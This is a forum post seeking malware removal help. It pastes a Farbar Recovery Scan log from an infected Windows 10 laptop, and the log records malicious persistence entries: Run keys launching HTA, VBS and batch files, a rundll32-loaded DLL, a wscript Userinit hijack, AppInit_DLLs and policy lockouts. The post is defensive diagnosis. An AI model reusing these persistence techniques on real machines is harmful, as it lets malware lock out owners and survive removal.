Jump to content


 


Register a free account to unlock additional features at BleepingComputer.com
Welcome to BleepingComputer, a free community where people like yourself come together to discuss and learn how to use their computers. Using the site is easy and fun. As a guest, you can browse and view the various discussions in the forums, but can not create a new topic or reply to an existing one unless you are logged in. Other benefits of registering an account are subscribing to topics and forums, creating a blog, and having no ads shown anywhere on the site.


Click here to Register a free account now! or read our Welcome Guide to learn how to use this site.

Latest News:    Holding Down Any iOS Keyboard Button Turns It Into a Mouse

Featured Deal: Get 98% off the Ultimate Cisco Certification Bundle: Lifetime Access Deal

Photo

Komodia Rootkit - Desktop blank - Group Policy infected

Started by Ronins8 , Apr 08 2016 10:24 AM

  • This topic is locked This topic is locked
15 replies to this topic

#1 Ronins8

Ronins8

  • Members
  • 22 posts
  • OFFLINE
    •  
  • Local time:02:32 PM

Posted 08 April 2016 - 10:24 AM

Hello!  Until recently I've been able to combat any and all infections I've gotten but this one is on another level!!  I have ran every piece of anti-walware out there but haven't been able to get back to 100%.  I'm now not able to have a desktop when the computer loads, just a black screen which I can only enable by CTRL+ALT+DLT, run task manager, file-> run-> explorer.exe.  This reloads my desktop, but the virus has added group policies which disable me as an admin.  I also see a wsdscript.exe that is running in the background which I cannot get rid of because of the group policy (same with windows defender).  Any help would be much appreciated :) :smash:   Below is my FRST64 log, and the 'addition' file that appeared when I ran the scan.

 

Attached File  FRST.txt   63.9KB   6 downloadsAttached File  Addition.txt   73.37KB   5 downloads

 

Scan result of Farbar Recovery Scan Tool (FRST) (x64) Version:05-03-2016 01
Ran by RoNiN (administrator) on RONIN-LAPTOP (08-04-2016 10:28:19)
Running from C:\virus
Loaded Profiles: RoNiN & postgres (Available Profiles: RoNiN & postgres & DefaultAppPool)
Platform: Windows 10 Home (X64) Language: English (United States)
Internet Explorer Version 11 (Default browser: Chrome)
Boot Mode: Normal
 
==================== Processes (Whitelisted) =================
 
(If an entry is included in the fixlist, the process will be closed. The file will not be moved.)
 
(Emsisoft Ltd) C:\Program Files\Emsisoft Anti-Malware\a2service.exe
(Google Inc.) C:\Program Files (x86)\Google\Chrome Remote Desktop\49.0.2623.40\remoting_host.exe
(Intel Corporation) C:\Program Files (x86)\Intel\Intel® Management Engine Components\LMS\LMS.exe
(MAGIX AG) C:\Program Files (x86)\Common Files\MAGIX Services\Database\bin\FABS.exe
(Micro-Star International Co., Ltd.) C:\Program Files (x86)\System Control Manager\MSIService.exe
(Malwarebytes) C:\Program Files (x86)\Malwarebytes Anti-Malware\mbamscheduler.exe
(Microsoft Corporation) C:\Program Files (x86)\Common Files\Microsoft Shared\VS7Debug\mdm.exe
(Microsoft Corporation) C:\Windows\System32\mqsvc.exe
(Microsoft Corporation) C:\Windows\Microsoft.NET\Framework64\v4.0.30319\SMSvcHost.exe
(Malwarebytes) C:\Program Files (x86)\Malwarebytes Anti-Malware\mbamservice.exe
(Thrustmaster®) C:\Program Files\Thrustmaster\FFB Racing wheel\drivers\amd64\tmInstall.exe
(Microsoft Corporation) C:\Program Files (x86)\Microsoft\Search Enhancement Pack\SeaPort\SeaPort.exe
(Microsoft Corporation) C:\Windows\Microsoft.NET\Framework64\v4.0.30319\SMSvcHost.exe
(Google Inc.) C:\Program Files (x86)\Google\Chrome Remote Desktop\49.0.2623.40\remoting_host.exe
(PostgreSQL Global Development Group) C:\Program Files (x86)\PostgreSQL\8.3\bin\pg_ctl.exe
(PostgreSQL Global Development Group) C:\Program Files (x86)\PostgreSQL\8.3\bin\postgres.exe
(PostgreSQL Global Development Group) C:\Program Files (x86)\PostgreSQL\8.3\bin\postgres.exe
(Malwarebytes) C:\Program Files (x86)\Malwarebytes Anti-Malware\mbam.exe
(PostgreSQL Global Development Group) C:\Program Files (x86)\PostgreSQL\8.3\bin\postgres.exe
(PostgreSQL Global Development Group) C:\Program Files (x86)\PostgreSQL\8.3\bin\postgres.exe
(PostgreSQL Global Development Group) C:\Program Files (x86)\PostgreSQL\8.3\bin\postgres.exe
(PostgreSQL Global Development Group) C:\Program Files (x86)\PostgreSQL\8.3\bin\postgres.exe
(Google Inc.) C:\Program Files (x86)\Google\Update\1.3.29.5\GoogleCrashHandler.exe
(Google Inc.) C:\Program Files (x86)\Google\Update\1.3.29.5\GoogleCrashHandler64.exe
(Microsoft Corporation) C:\Windows\System32\Taskmgr.exe
(Microsoft Corporation) C:\Windows\System32\rundll32.exe
(Intel Corporation) C:\Program Files (x86)\Intel\Intel® Rapid Storage Technology\IAStorDataMgrSvc.exe
(Intel Corporation) C:\Program Files (x86)\Intel\Intel® Management Engine Components\UNS\UNS.exe
(Microsoft Corporation) C:\Windows\System32\SettingSyncHost.exe
(Microsoft Corporation) C:\Windows\SysWOW64\mmc.exe
(Microsoft Corporation) C:\Windows\System32\dllhost.exe
(Microsoft Corporation) C:\Windows\System32\dllhost.exe
 
 
==================== Registry (Whitelisted) ===========================
 
(If an entry is included in the fixlist, the registry item will be restored to default or removed. The file will not be moved.)
 
HKLM\...\Run: [ETDCtrl] => C:\Program Files\Elantech\ETDCtrl.exe [3738336 2015-10-31] (ELAN Microelectronics Corp.)
HKLM\...\Run: [RtHDVCpl] => C:\Program Files\Realtek\Audio\HDA\RAVCpl64.exe [10816544 2010-05-25] (Realtek Semiconductor)
HKLM\...\Run: [THXCfg64] => C:\windows\system32\RunDLL32.exe C:\windows\system32\THXCfg64.dll,RunDLLEntry THXCfg64
HKLM\...\Run: [ETDWare] => C:\Program Files\Elantech\ETDCtrl.exe [3738336 2015-10-31] (ELAN Microelectronics Corp.)
HKLM\...\Run: [emsisoft anti-malware] => c:\program files\emsisoft anti-malware\a2guard.exe [9402680 2016-03-24] (Emsisoft Ltd)
HKLM-x32\...\Run: [IAStorIcon] => C:\Program Files (x86)\Intel\Intel® Rapid Storage Technology\IAStorIcon.exe [284696 2010-04-13] (Intel Corporation)
HKLM-x32\...\Run: [MGSysCtrl] => C:\Program Files (x86)\System Control Manager\MGSysCtrl.exe [2486272 2010-06-04] (Micro-Star International Co., Ltd.)
HKLM-x32\...\Run: [THX Audio Control Panel] => C:\Program Files (x86)\Creative\THX TruStudio Pro\THXAudioCP\THXAudio.exe [1349632 2010-05-16] (Creative Technology Ltd)
HKLM-x32\...\Run: [CitrixReceiver] => "C:\ProgramData\Microsoft\Windows\Start Menu\Programs\Citrix\Receiver Updater.lnk"
HKLM-x32\...\Run: [TkBellExe] => "C:\Users\RoNiN\update\realsched.exe"  -osboot
HKLM-x32\...\Run: [ConnectionCenter] => C:\Program Files (x86)\Citrix\ICA Client\concentr.exe [407904 2015-04-08] (Citrix Systems, Inc.)
HKLM-x32\...\Run: [Redirector] => C:\Program Files (x86)\Citrix\ICA Client\redirector.exe [153952 2015-04-08] (Citrix Systems, Inc.)
HKLM-x32\...\Run: [win_en_77] => [X]
HKLM-x32\...\Run: [Rt562@] => C:\WINDOWS\Disable  task manager .bat
HKLM-x32\...\Run: [QwaT] => C:\Documents and Settings\All Users\Start Menu\Programs\Startup\bsod.hta
HKLM-x32\...\Run: [Rty01] => C:\WINDOWS\call.vbs
HKLM-x32\...\Run: [TV] => C:\WINDOWS\TV
HKLM-x32\...\Run: [QwaT78] => C:\Documents and Settings\All Users\Start Menu\Programs\Startup\bsod.hta
HKLM-x32\...\Run: [QwaT21] => C:\Documents and Settings\All Users\Start Menu\Programs\Startup\bsod.hta
HKLM-x32\...\Run: [Rt45] => C:\WINDOWS\auto explore.bat
HKLM-x32\...\Run: [QwaT55] => C:\Documents and Settings\All Users\Start Menu\Programs\Startup\bsod.hta
HKLM-x32\...\Run: [QwaT22] => C:\Documents and Settings\All Users\Start Menu\Programs\Startup\bsod.hta
HKLM-x32\...\Run: [QwaTgg] => C:\Documents and Settings\All Users\Start Menu\Programs\Startup\bsod.hta
HKLM-x32\...\Run: [QwaT5] => C:\Documents and Settings\All Users\Start Menu\Programs\Startup\bsod.hta
HKLM-x32\...\Run: [QwaT4] => C:\Documents and Settings\All Users\Start Menu\Programs\Startup\bsod.hta
HKLM-x32\...\Run: [QwaT1] => C:\Documents and Settings\All Users\Start Menu\Programs\Startup\bsod.hta
HKLM-x32\...\Run: [BSOD] => C:\WINDOWS\bsod.hta
HKLM-x32\...\Run: [rst] => C:\WINDOWS\rst.bat
HKLM-x32\...\Run: [SunJavaUpdateSched] => C:\Program Files (x86)\Common Files\Java\Java Update\jusched.exe [595480 2016-03-20] (Oracle Corporation)
HKLM-x32\...\RunOnce: [Malwarebytes Anti-Malware (cleanup)] => C:\ProgramData\Malwarebytes\Malwarebytes Anti-Malware\mbamdor.exe [55264 2016-03-10] (Malwarebytes)
HKLM-x32\...\RunOnce: [DeleteOnReboot] => C:\Users\RoNiN\AppData\Local\Temp\DeleteOnReboot.bat [134 2016-04-07] () <===== ATTENTION
HKLM\...\Winlogon: [Userinit] wscript,
Winlogon\Notify\igfxcui: C:\WINDOWS\SYSTEM32\igfxdev.dll (Intel Corporation)
HKU\S-1-5-21-470165136-1162808608-978993673-1001\...\Run: [Google Update] => C:\Users\RoNiN\AppData\Local\Google\Update\GoogleUpdate.exe [144200 2015-08-28] (Google Inc.)
HKU\S-1-5-21-470165136-1162808608-978993673-1001\...\Run: [SideSync] => C:\Program Files (x86)\Samsung\SideSync4\SideSync.exe [9580864 2015-10-13] ()
HKU\S-1-5-21-470165136-1162808608-978993673-1001\...\Run: [MusicManager] => C:\Users\RoNiN\AppData\Local\Programs\Google\MusicManager\MusicManager.exe [7643136 2015-11-17] (Google Inc.)
HKU\S-1-5-21-470165136-1162808608-978993673-1001\...\Run: [wdbext] => rundll32.exe "C:\Users\RoNiN\AppData\Local\wdbext.dll",wdbext <===== ATTENTION
AppInit_DLLs: C:\ProgramData\AppxikenoZ\Volity.dll => No File
AppInit_DLLs-x32: C:\ProgramData\AppxikenoZ\Goldenphase.dll => No File
ShellIconOverlayIdentifiers: [ SkyDrive1] -> {F241C880-6982-4CE5-8CF7-7085BA96DA5A} => C:\Users\RoNiN\AppData\Local\Microsoft\OneDrive\17.3.5951.0827\amd64\FileSyncShell64.dll [2015-10-03] (Microsoft Corporation)
ShellIconOverlayIdentifiers: [ SkyDrive2] -> {A0396A93-DC06-4AEF-BEE9-95FFCCAEF20E} => C:\Users\RoNiN\AppData\Local\Microsoft\OneDrive\17.3.5951.0827\amd64\FileSyncShell64.dll [2015-10-03] (Microsoft Corporation)
ShellIconOverlayIdentifiers: [ SkyDrive3] -> {BBACC218-34EA-4666-9D7A-C78F2274A524} => C:\Users\RoNiN\AppData\Local\Microsoft\OneDrive\17.3.5951.0827\amd64\FileSyncShell64.dll [2015-10-03] (Microsoft Corporation)
ShellIconOverlayIdentifiers-x32: [ SkyDrive1] -> {F241C880-6982-4CE5-8CF7-7085BA96DA5A} => C:\Users\RoNiN\AppData\Local\Microsoft\OneDrive\17.3.5951.0827\FileSyncShell.dll [2015-10-03] (Microsoft Corporation)
ShellIconOverlayIdentifiers-x32: [ SkyDrive2] -> {A0396A93-DC06-4AEF-BEE9-95FFCCAEF20E} => C:\Users\RoNiN\AppData\Local\Microsoft\OneDrive\17.3.5951.0827\FileSyncShell.dll [2015-10-03] (Microsoft Corporation)
ShellIconOverlayIdentifiers-x32: [ SkyDrive3] -> {BBACC218-34EA-4666-9D7A-C78F2274A524} => C:\Users\RoNiN\AppData\Local\Microsoft\OneDrive\17.3.5951.0827\FileSyncShell.dll [2015-10-03] (Microsoft Corporation)
GroupPolicy: Restriction - Chrome <======= ATTENTION
GroupPolicyScripts-x32\User: Restriction <======= ATTENTION
CHR HKLM\SOFTWARE\Policies\Google: Restriction <======= ATTENTION
 
==================== Internet (Whitelisted) ====================
 
(If an item is included in the fixlist, if it is a registry item it will be removed or restored to default.)
 
Hosts: There are more than one entry in Hosts. See Hosts section of Addition.txt
Tcpip\..\Interfaces\{9cc31965-f3ac-45a8-a3c1-a9ad1c45f485}: [DhcpNameServer] 192.168.6.1 64.134.255.2 64.134.255.10
Tcpip\..\Interfaces\{c78fcb73-f14a-4b1e-b0ad-7bf0f8fa0b67}: [DhcpNameServer] 192.168.1.1
 
Internet Explorer:
==================
HKLM\SOFTWARE\Policies\Microsoft\Internet Explorer: Restriction <======= ATTENTION
HKU\S-1-5-21-470165136-1162808608-978993673-1001\SOFTWARE\Policies\Microsoft\Internet Explorer: Restriction <======= ATTENTION
SearchScopes: HKLM -> DefaultScope {A2516833-3348-406A-96A6-26AAA93BF9DE} URL = 
SearchScopes: HKLM -> OldSearch URL = hxxp://www.bing.com/search?q={searchTerms}&form=MSITDF&pc=MAMI&src=IE-SearchBox
SearchScopes: HKLM-x32 -> {DF74C2BD-9885-45D2-AC3E-F2865A90DEAB} URL = hxxp://www.bing.com/search?q={searchTerms}&form=MSITDF&pc=MAMI&src=IE-SearchBox
SearchScopes: HKU\S-1-5-21-470165136-1162808608-978993673-1001 -> {0F462454-2A7D-48CE-B2B5-ECD4B55B6026} URL = hxxp://www.bing.com/search?q={searchTerms}&form=MSSEDF&pc=MSE1
SearchScopes: HKU\S-1-5-21-470165136-1162808608-978993673-1001 -> {A2516833-3348-406A-96A6-26AAA93BF9DE} URL = 
SearchScopes: HKU\S-1-5-21-470165136-1162808608-978993673-1001 -> {C9D867C8-1E65-4F71-970A-C677CAECFCC3} URL = hxxps://search.yahoo.com/search?p={searchTerms}&fr=yset_ie_syc_oracle&type=orcl_default
SearchScopes: HKU\S-1-5-21-470165136-1162808608-978993673-1001 -> {DF74C2BD-9885-45D2-AC3E-F2865A90DEAB} URL = 
BHO-x32: Adobe PDF Link Helper -> {18DF081C-E8AD-4283-A596-FA578C2EBDC3} -> C:\Program Files (x86)\Common Files\Adobe\Acrobat\ActiveX\AcroIEHelperShim.dll [2012-09-23] (Adobe Systems Incorporated)
BHO-x32: RealNetworks Download and Record Plugin for Internet Explorer -> {3049C3E9-B461-4BC5-8870-4C09146192CA} -> C:\ProgramData\RealNetworks\RealDownloader\BrowserPlugins\IE\rndlbrowserrecordplugin.dll [2013-04-16] (RealDownloader)
BHO-x32: No Name -> {5C255C8A-E604-49b4-9D64-90988571CECB} -> No File
BHO-x32: Search Helper -> {6EBF7485-159F-4bff-A14F-B9E3AAC4465B} -> C:\Program Files (x86)\Microsoft\Search Enhancement Pack\Search Helper\SEPsearchhelperie.dll [2010-01-14] (Microsoft Corporation)
BHO-x32: Java™ Plug-In SSV Helper -> {761497BB-D6F0-462C-B6EB-D4DAF1D92D43} -> C:\Program Files (x86)\Java\jre1.8.0_77\bin\ssv.dll [2016-03-29] (Oracle Corporation)
BHO-x32: Skype Plug-In -> {AE805869-2E5C-4ED4-8F7B-F1F7851A4497} -> C:\Program Files (x86)\Skype\Toolbars\Internet Explorer\skypeieplugin.dll [2010-11-22] (Skype Technologies S.A.)
BHO-x32: Java™ Plug-In 2 SSV Helper -> {DBC80044-A445-435b-BC74-9C25C1C588A9} -> C:\Program Files (x86)\Java\jre1.8.0_77\bin\jp2ssv.dll [2016-03-29] (Oracle Corporation)
BHO-x32: Windows Live Toolbar Helper -> {E15A8DC0-8516-42A1-81EA-DC94EC1ACF10} -> C:\Program Files (x86)\Windows Live\Toolbar\wltcore.dll [2009-02-06] (Microsoft Corporation)
DPF: HKLM-x32 {02BCC737-B171-4746-94C9-0D8A0B2C0089} hxxp://office.microsoft.com/sites/production/ieawsdc32.cab
DPF: HKLM-x32 {67DABFBF-D0AB-41FA-9C46-CC0F21721616} hxxp://download.divx.com/player/DivXBrowserPlugin.cab
DPF: HKLM-x32 {6C269571-C6D7-4818-BCA4-32A035E8C884} hxxp://ccfiles.creative.com/Web/softwareupdate/su/ocx/15101/CTSUEng.cab
DPF: HKLM-x32 {E2883E8F-472F-4FB0-9522-AC9BF37916A7} hxxp://platformdl.adobe.com/NOS/getPlusPlus/1.6/gp.cab
DPF: HKLM-x32 {F27237D7-93C8-44C2-AC6E-D6057B9A918F} hxxps://connect.bedbath.com/dana-cached/sc/JuniperSetupClient.cab
DPF: HKLM-x32 {F6ACF75C-C32C-447B-9BEF-46B766368D29} hxxp://ccfiles.creative.com/Web/softwareupdate/su/ocx/15112/CTPID.cab
Handler-x32: cdo - {CD00020A-8B95-11D1-82DB-00C04FB1625D} - C:\Program Files (x86)\Common Files\Microsoft Shared\Web Folders\PKMCDO.DLL [2001-01-22] (Microsoft Corporation)
Handler-x32: livecall - {828030A1-22C1-4009-854F-8E305202313F} - C:\Program Files (x86)\Windows Live\Messenger\msgrapp.14.0.8089.0726.dll [2009-07-26] (Microsoft Corporation)
Handler-x32: msnim - {828030A1-22C1-4009-854F-8E305202313F} - C:\Program Files (x86)\Windows Live\Messenger\msgrapp.14.0.8089.0726.dll [2009-07-26] (Microsoft Corporation)
Handler-x32: skype-ie-addon-data - {91774881-D725-4E58-B298-07617B9B86A8} - C:\Program Files (x86)\Skype\Toolbars\Internet Explorer\skypeieplugin.dll [2010-11-22] (Skype Technologies S.A.)
Handler-x32: skype4com - {FFC8B962-9B40-4DFF-9458-1830C7DD7F5D} - C:\Program Files (x86)\Common Files\Skype\Skype4COM.dll [2013-02-26] (Skype Technologies)
Filter-x32: application/x-ica - {CFB6322E-CC85-4d1b-82C7-893888A236BC} - C:\Program Files (x86)\Citrix\ICA Client\IcaMimeFilter.dll [2015-04-08] (Citrix Systems, Inc.)
Filter-x32: application/x-ica; charset=euc-jp - {CFB6322E-CC85-4d1b-82C7-893888A236BC} - C:\Program Files (x86)\Citrix\ICA Client\IcaMimeFilter.dll [2015-04-08] (Citrix Systems, Inc.)
Filter-x32: application/x-ica; charset=ISO-8859-1 - {CFB6322E-CC85-4d1b-82C7-893888A236BC} - C:\Program Files (x86)\Citrix\ICA Client\IcaMimeFilter.dll [2015-04-08] (Citrix Systems, Inc.)
Filter-x32: application/x-ica; charset=MS936 - {CFB6322E-CC85-4d1b-82C7-893888A236BC} - C:\Program Files (x86)\Citrix\ICA Client\IcaMimeFilter.dll [2015-04-08] (Citrix Systems, Inc.)
Filter-x32: application/x-ica; charset=MS949 - {CFB6322E-CC85-4d1b-82C7-893888A236BC} - C:\Program Files (x86)\Citrix\ICA Client\IcaMimeFilter.dll [2015-04-08] (Citrix Systems, Inc.)
Filter-x32: application/x-ica; charset=MS950 - {CFB6322E-CC85-4d1b-82C7-893888A236BC} - C:\Program Files (x86)\Citrix\ICA Client\IcaMimeFilter.dll [2015-04-08] (Citrix Systems, Inc.)
Filter-x32: application/x-ica; charset=UTF-8 - {CFB6322E-CC85-4d1b-82C7-893888A236BC} - C:\Program Files (x86)\Citrix\ICA Client\IcaMimeFilter.dll [2015-04-08] (Citrix Systems, Inc.)
Filter-x32: application/x-ica; charset=UTF8 - {CFB6322E-CC85-4d1b-82C7-893888A236BC} - C:\Program Files (x86)\Citrix\ICA Client\IcaMimeFilter.dll [2015-04-08] (Citrix Systems, Inc.)
Filter-x32: application/x-ica;charset=euc-jp - {CFB6322E-CC85-4d1b-82C7-893888A236BC} - C:\Program Files (x86)\Citrix\ICA Client\IcaMimeFilter.dll [2015-04-08] (Citrix Systems, Inc.)
Filter-x32: application/x-ica;charset=ISO-8859-1 - {CFB6322E-CC85-4d1b-82C7-893888A236BC} - C:\Program Files (x86)\Citrix\ICA Client\IcaMimeFilter.dll [2015-04-08] (Citrix Systems, Inc.)
Filter-x32: application/x-ica;charset=MS936 - {CFB6322E-CC85-4d1b-82C7-893888A236BC} - C:\Program Files (x86)\Citrix\ICA Client\IcaMimeFilter.dll [2015-04-08] (Citrix Systems, Inc.)
Filter-x32: application/x-ica;charset=MS949 - {CFB6322E-CC85-4d1b-82C7-893888A236BC} - C:\Program Files (x86)\Citrix\ICA Client\IcaMimeFilter.dll [2015-04-08] (Citrix Systems, Inc.)
Filter-x32: application/x-ica;charset=MS950 - {CFB6322E-CC85-4d1b-82C7-893888A236BC} - C:\Program Files (x86)\Citrix\ICA Client\IcaMimeFilter.dll [2015-04-08] (Citrix Systems, Inc.)
Filter-x32: application/x-ica;charset=UTF-8 - {CFB6322E-CC85-4d1b-82C7-893888A236BC} - C:\Program Files (x86)\Citrix\ICA Client\IcaMimeFilter.dll [2015-04-08] (Citrix Systems, Inc.)
Filter-x32: application/x-ica;charset=UTF8 - {CFB6322E-CC85-4d1b-82C7-893888A236BC} - C:\Program Files (x86)\Citrix\ICA Client\IcaMimeFilter.dll [2015-04-08] (Citrix Systems, Inc.)
Filter-x32: ica - {CFB6322E-CC85-4d1b-82C7-893888A236BC} - C:\Program Files (x86)\Citrix\ICA Client\IcaMimeFilter.dll [2015-04-08] (Citrix Systems, Inc.)
 
FireFox:
========
FF Plugin: @adobe.com/FlashPlayer -> C:\windows\system32\Macromed\Flash\NPSWF64_16_0_0_305.dll [2015-02-06] ()
FF Plugin: @esn/npbattlelog,version=2.6.2 -> C:\Program Files (x86)\Battlelog Web Plugins\2.6.2\npbattlelogx64.dll [2015-01-13] (EA Digital Illusions CE AB)
FF Plugin: @Microsoft.com/NpCtrl,version=1.0 -> C:\Program Files\Microsoft Silverlight\5.1.40416.0\npctrl.dll [2015-04-16] ( Microsoft Corporation)
FF Plugin-x32: @adobe.com/FlashPlayer -> C:\windows\SysWOW64\Macromed\Flash\NPSWF32_16_0_0_305.dll [2015-02-06] ()
FF Plugin-x32: @Apple.com/iTunes,version=1.0 -> C:\Program Files (x86)\iTunes\Mozilla Plugins\npitunes.dll [2014-02-18] ()
FF Plugin-x32: @Citrix.com/npican -> C:\Program Files (x86)\Citrix\ICA Client\npicaN.dll [2015-04-08] (Citrix Systems, Inc.)
FF Plugin-x32: @esn/npbattlelog,version=2.6.2 -> C:\Program Files (x86)\Battlelog Web Plugins\2.6.2\npbattlelog.dll [2015-01-13] (EA Digital Illusions CE AB)
FF Plugin-x32: @Google.com/GoogleEarthPlugin -> C:\Program Files (x86)\Google\Google Earth\plugin\npgeplugin.dll [2013-10-07] (Google)
FF Plugin-x32: @java.com/DTPlugin,version=11.77.2 -> C:\Program Files (x86)\Java\jre1.8.0_77\bin\dtplugin\npDeployJava1.dll [2016-03-29] (Oracle Corporation)
FF Plugin-x32: @java.com/JavaPlugin,version=11.77.2 -> C:\Program Files (x86)\Java\jre1.8.0_77\bin\plugin2\npjp2.dll [2016-03-29] (Oracle Corporation)
FF Plugin-x32: @messenger.yahoo.com/YahooMessengerStatePlugin;version=1.0.0.6 -> C:\Program Files (x86)\Yahoo!\Shared\npYState.dll [2011-06-16] (Yahoo! Inc.)
FF Plugin-x32: @Microsoft.com/NpCtrl,version=1.0 -> C:\Program Files (x86)\Microsoft Silverlight\5.1.40416.0\npctrl.dll [2015-04-15] ( Microsoft Corporation)
FF Plugin-x32: @microsoft.com/WLPG,version=14.0.8081.0709 -> C:\Program Files (x86)\Windows Live\Photo Gallery\NPWLPG.dll [2009-07-10] (Microsoft Corporation)
FF Plugin-x32: @Motive.com/NpMotive,version=1.0 -> C:\Program Files (x86)\Common Files\Motive\npMotive.dll [2010-11-08] (Alcatel-Lucent)
FF Plugin-x32: @real.com/nppl3260;version=16.0.2.32 -> C:\Users\RoNiN\Netscape6\nppl3260.dll [2013-07-11] (RealNetworks, Inc.)
FF Plugin-x32: @real.com/nprndlchromebrowserrecordext;version=1.3.2 -> C:\ProgramData\RealNetworks\RealDownloader\BrowserPlugins\MozillaPlugins\nprndlchromebrowserrecordext.dll [2013-04-16] (RealNetworks, Inc.)
FF Plugin-x32: @real.com/nprndlhtml5videoshim;version=1.3.2 -> C:\ProgramData\RealNetworks\RealDownloader\BrowserPlugins\MozillaPlugins\nprndlhtml5videoshim.dll [2013-04-16] (RealNetworks, Inc.)
FF Plugin-x32: @real.com/nprndlpepperflashvideoshim;version=1.3.2 -> C:\ProgramData\RealNetworks\RealDownloader\BrowserPlugins\MozillaPlugins\nprndlpepperflashvideoshim.dll [2013-04-16] (RealNetworks, Inc.)
FF Plugin-x32: @real.com/nprpplugin;version=16.0.2.32 -> C:\Users\RoNiN\Netscape6\nprpplugin.dll [2013-07-11] (RealPlayer)
FF Plugin-x32: @realnetworks.com/npdlplugin;version=1 -> C:\ProgramData\RealNetworks\RealDownloader\BrowserPlugins\npdlplugin.dll [2013-04-16] (RealDownloader)
FF Plugin-x32: @tools.google.com/Google Update;version=3 -> C:\Program Files (x86)\Google\Update\1.3.29.5\npGoogleUpdate3.dll [2016-01-31] (Google Inc.)
FF Plugin-x32: @tools.google.com/Google Update;version=9 -> C:\Program Files (x86)\Google\Update\1.3.29.5\npGoogleUpdate3.dll [2016-01-31] (Google Inc.)
FF Plugin-x32: @veetle.com/veetleCorePlugin,version=0.9.18 -> C:\Program Files (x86)\Veetle\plugins\npVeetle.dll [2010-10-15] (Veetle Inc)
FF Plugin-x32: @veetle.com/veetlePlayerPlugin,version=0.9.18 -> C:\Program Files (x86)\Veetle\Player\npvlc.dll [2010-09-21] (Veetle Inc)
FF Plugin-x32: Adobe Reader -> C:\Program Files (x86)\Adobe\Reader 11.0\Reader\AIR\nppdf32.dll [2013-02-15] (Adobe Systems Inc.)
FF Plugin HKU\S-1-5-21-470165136-1162808608-978993673-1001: @nds.com/PlayerPlugin -> C:\Users\RoNiN\AppData\Local\DIRECTV Player\npPlayerPlugin.dll [2014-03-26] (DIRECTV)
FF Plugin HKU\S-1-5-21-470165136-1162808608-978993673-1001: @tools.google.com/Google Update;version=3 -> C:\Users\RoNiN\AppData\Local\Google\Update\1.3.29.5\npGoogleUpdate3.dll [2016-02-01] (Google Inc.)
FF Plugin HKU\S-1-5-21-470165136-1162808608-978993673-1001: @tools.google.com/Google Update;version=9 -> C:\Users\RoNiN\AppData\Local\Google\Update\1.3.29.5\npGoogleUpdate3.dll [2016-02-01] (Google Inc.)
FF Plugin HKU\S-1-5-21-470165136-1162808608-978993673-1001: NDS.com/PlayerPlugin -> C:\Users\RoNiN\AppData\Local\DIRECTV Player\npPlayerPlugin.dll [2014-03-26] (DIRECTV)
FF HKLM-x32\...\Firefox\Extensions: [{27182e60-b5f3-411c-b545-b44205977502}] - C:\Program Files (x86)\Microsoft\Search Enhancement Pack\Search Helper\firefoxextension\SearchHelperExtension
FF Extension: Search Helper Extension - C:\Program Files (x86)\Microsoft\Search Enhancement Pack\Search Helper\firefoxextension\SearchHelperExtension [2010-10-26] [not signed]
FF HKLM-x32\...\Firefox\Extensions: [quickprint@hp.com] - C:\Program Files (x86)\Hewlett-Packard\SmartPrint\QPExtension
FF Extension: SmartPrintButton - C:\Program Files (x86)\Hewlett-Packard\SmartPrint\QPExtension [2011-01-26] [not signed]
FF HKLM-x32\...\Firefox\Extensions: [{FCE04E1F-9378-4f39-96F6-5689A9159E45}] - C:\ProgramData\RealNetworks\RealDownloader\BrowserPlugins\Firefox\Ext
FF Extension: RealDownloader - C:\ProgramData\RealNetworks\RealDownloader\BrowserPlugins\Firefox\Ext [2013-07-11] [not signed]
 
Chrome: 
=======
CHR HomePage: Default -> hxxp://www.google.com/
CHR DefaultSearchURL: Default -> hxxp://www-searching.com/search.aspx?site=shdefault&prd=smw&pid=s&shr=d&q={searchTerms}&s=Unknown
CHR DefaultSearchKeyword: Default -> www-searching.com
CHR DefaultSuggestURL: Default -> hxxp://api.searchpredict.com/api/?rqtype=ffplugin&siteID=8661&dbCode=1&command={searchTerms}
CHR Profile: C:\Users\RoNiN\AppData\Local\Google\Chrome\User Data\Default
CHR Extension: (Google Docs) - C:\Users\RoNiN\AppData\Local\Google\Chrome\User Data\Default\Extensions\aohghmighlieiainnegkcijnfilokake [2015-10-09]
CHR Extension: (Google Drive) - C:\Users\RoNiN\AppData\Local\Google\Chrome\User Data\Default\Extensions\apdfllckaahabafndbhieahigkjlhalf [2015-10-28]
CHR Extension: (YouTube) - C:\Users\RoNiN\AppData\Local\Google\Chrome\User Data\Default\Extensions\blpcfgokakmgnkcojhhkbfbldkacnbeo [2015-09-26]
CHR Extension: (Google Search) - C:\Users\RoNiN\AppData\Local\Google\Chrome\User Data\Default\Extensions\coobgpohoikkiipiblmjeljniedjpjpf [2015-10-28]
CHR Extension: (MightyText - SMS from PC & Text from Computer) - C:\Users\RoNiN\AppData\Local\Google\Chrome\User Data\Default\Extensions\dkfhfaphfkopdgpbfkebjfcblcafcmpi [2016-01-13]
CHR Extension: (Google Cast (Beta)) - C:\Users\RoNiN\AppData\Local\Google\Chrome\User Data\Default\Extensions\dliochdbjfkdbacpmhlcpmleaejidimm [2016-03-22]
CHR Extension: (Google Calendar) - C:\Users\RoNiN\AppData\Local\Google\Chrome\User Data\Default\Extensions\ejjicmeblgpmajnghnpcppodonldlgfn [2015-10-12]
CHR Extension: (Google Play Music) - C:\Users\RoNiN\AppData\Local\Google\Chrome\User Data\Default\Extensions\fahmaaghhglfmonjliepjlchgpgfmobi [2016-04-07]
CHR Extension: (Google Sheets) - C:\Users\RoNiN\AppData\Local\Google\Chrome\User Data\Default\Extensions\felcaaldnbdncclmgdcncolpebgiejap [2015-11-11]
CHR Extension: (Chrome Remote Desktop) - C:\Users\RoNiN\AppData\Local\Google\Chrome\User Data\Default\Extensions\gbchcmhmhahfdphkhkmpfmihenigjmpp [2016-03-02]
CHR Extension: (Google Cast (Beta)) - C:\Users\RoNiN\AppData\Local\Google\Chrome\User Data\Default\Extensions\gdijeikdkaembjbdobgfkoidjkpbmlkd [2016-03-02]
CHR Extension: (Google Docs Offline) - C:\Users\RoNiN\AppData\Local\Google\Chrome\User Data\Default\Extensions\ghbmnnjooekpmoecnnnilnnbdlolhkhi [2016-03-22]
CHR Extension: (Google Keep - notes and lists) - C:\Users\RoNiN\AppData\Local\Google\Chrome\User Data\Default\Extensions\hmjkmjkepdijhoojdojkdfohbdgmmhki [2016-04-07]
CHR Extension: (Facebook Album & Photo Manager) - C:\Users\RoNiN\AppData\Local\Google\Chrome\User Data\Default\Extensions\lgiedegfmekolcplboelnmfoiefpcpfg [2015-08-15]
